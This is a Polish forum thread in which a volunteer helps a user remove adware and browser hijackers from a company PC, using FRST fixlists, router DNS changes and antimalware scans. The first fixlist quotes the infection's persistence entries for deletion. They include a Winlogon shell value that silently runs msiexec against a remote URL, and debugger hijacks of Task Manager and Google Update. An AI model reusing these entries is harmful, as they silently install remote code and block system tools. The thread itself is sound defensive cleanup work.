Bigfarm - kolejny problem.

[BEN]

Witam Wszystkich,

 

mam podobny problem jak tu: https://www.fixitpc.pl/topic/32598-bigfarm-itd/

dodam że nie jestem super biegły w sprawach naprawiania uszkodzonych rejestrów itp. nawet nie wiem jak to nazwać dokładnie.
Generalnie mam problem z przeglądarką, też mi się samoistnie zainstalowały podobne programy. Załączam raport z GMER i proszę o POMOC!!!

 

EDIT: BŁAGAM WAS O POMOC!!!
Nikt mi jeszcze nic nie odpisał, a jest to komputer firmowy. Proszę o jasne odpowiedzi jak dla przysłowiowej "blondynki". Zaraz mnie coś trafi z tym wirusem.

logGMER.txt

Addition.txt

FRST.txt

GMER.txt

Shortcut.txt

Edytowane 16 Maja 2017 przez Rucek
Post wydzielam w osobny temat. Stosuj się proszę do zasad. Czekamy na Miszela. Nic nie ruszaj.

[Miszel03]

EDIT: BŁAGAM WAS O POMOC!!!

Nikt mi jeszcze nic nie odpisał, a jest to komputer firmowy. Proszę o jasne odpowiedzi jak dla przysłowiowej "blondynki". Zaraz mnie coś trafi z tym wirusem.

 

Trudno bym odpisywał 24 godziny na dobę. Instrukcję będą sprecyzowane w takiej formie, że na pewno Sobie poradzisz. 

 

---

 

Są podstawione dwa prefabrykowane przeglądarki podszywające się pod Google Chroem oraz Mozilla FireFox. Oprócz tego wspomniany BigFarm zainfekował skróty przeglądarek. Amerykański adres ustawiony na routerze wydaję się być podejrzany (KLIK) - podaje instrukcje do zmiany.

 

Wygląda na to, że szybko się z tym uporamy. 

P.S: Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające. Przejrzyj - KLIK.

 

1. Przez panel sterowania odinstaluj:

• Zbędniki / Przestarzałe oprogramowanie: Spybot - Search & Destroy.

2. Zaloguj się do routera:

• Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4
• Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK.

Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony:

 

3. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Footjane
RemoveDirectory: C:\Users\Ben\AppData\Roaming\Footjane
RemoveDirectory: C:\Users\Ben\AppData\Local\Footjane
C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
ShortcutWithArgument: C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
FirewallRules: [{DBEC1BB9-D594-4454-96FB-8C6E5E41D94D}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Ben\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Ben\AppData\Local\Firefox
RemoveDirectory: C:\Program Files (x86)\Firefox
FirewallRules: [{3567C494-B371-44EE-A8B6-9433F3F3BAE9}] => (Allow) C:\Program Files (x86)\Footjane\Application\chrome.exe
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMjq2RkM1RWVQOWZLMTE8FTk2MdY3MdF1MdYdFdqcNc== /q
IFEO\DisplaySwitch.exe: [Debugger] 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger] 
R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\setup\install.dll [104448 2017-05-15] (TODO: ) [brak podpisu cyfrowego] 
S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X]
C:\ProgramData\Microsoft\AppV\setup\install.dll
C:\ProgramData\Apple\Common\Cloud\WinHelper.dll
U3 uxrirpow; \??\C:\Users\Ben\AppData\Local\Temp\uxrirpow.sys [X] 
C:\Users\Ben\Dysk Google\OFERTY BEN\SkyDrive.lnk
C:\Users\Ben\Dysk Google\EMCS\EMCS Offline Generator.lnk
C:\Users\Ben\Dysk Google\EMCS\Protektor.lnk
C:\Users\Ben\Dysk Google\EMCS\Nowy EMCS\EMCS Offline Generator.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla\Firefox
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Ben\AppData\Local\Mozilla\Firefox
C:\Users\Ben\AppData\Roaming\Mozilla\Firefox
C:\Users\Ben\AppData\Roaming\Profiles
CMD: ipconfig /flushdns 
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

4. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
• Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
• Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji.

5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

footjane;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 

 

6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 

 

7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

[BEN]

Dziękuję za odpowiedź.

przesyłam pliki. 

Addition.txt

AdwCleanerC0.txt

FRST.txt

SearchReg.txt

Shortcut.txt

[Miszel03]

Dlaczego DNS nie zmienione? To celowe ustawienie jest?

 

Jeśli chodzi o resztę to jest już lepiej. Czas na poprawki i skan antywirusowy.

P.S: Jak proszę o skan to tylko o skan, a nie o skan + czyszczenie (patrz pkt. 6) Teraz odpuszczam, ale proszę czytaj moje punkty dokładnie.

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Footjane
DeleteKey: HKEY_USERS\S-1-5-21-1648149943-899210602-299422045-1001\Software\Footjane
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox
DeleteKey: HKEY_USERS\S-1-5-21-1648149943-899210602-299422045-1001\Software\Firefox
2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\00
2017-04-21 13:57 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 16:52 - 2017-04-26 07:13 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-20 16:51 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\11
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware (masz zainstalowany, więc robisz tylko aktualizację baz i programu). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

 

3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt.

Podsumuj również obecny stan systemu.

[BEN]

Jeszcze raz dziękuję za odpowiedź.
Z tymi DNSami to chyba celowo, nie wiem bo nie mam dostępu żeby to zmienić, jak skanowałem za pomocą linku czy połączenie z serwerem jest bezpieczne pokazywało że jest.
W załączniku raporty, mam nadzieję, że teraz niczego nie pochrzaniłem.

 

EDIT: Co do systemu, to faktycznie jest znacznie lepiej niż było, jedyne co to tak jakby wolniej się uruchamiał przy starcie. Tak jest wszystko w porządku.

Addition.txt

FRST.txt

malwarebytes.txt

Shortcut.txt

[Miszel03]

MBAM niczego nie wykrywa. 

System wyczyszczony z infekcji, a skoro piszesz, że problem infekcyjny ustąpił to będziemy kończyć. 

 

Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

 

Jako, że świadczymy profesjonalną pomoc i tylko taką to związku z wolniejszym startem systemu pokieruję Ci do działu Windows 7, może tam ktoś coś na to poradzi. 

[BEN]

Super dziękuję za pomoc!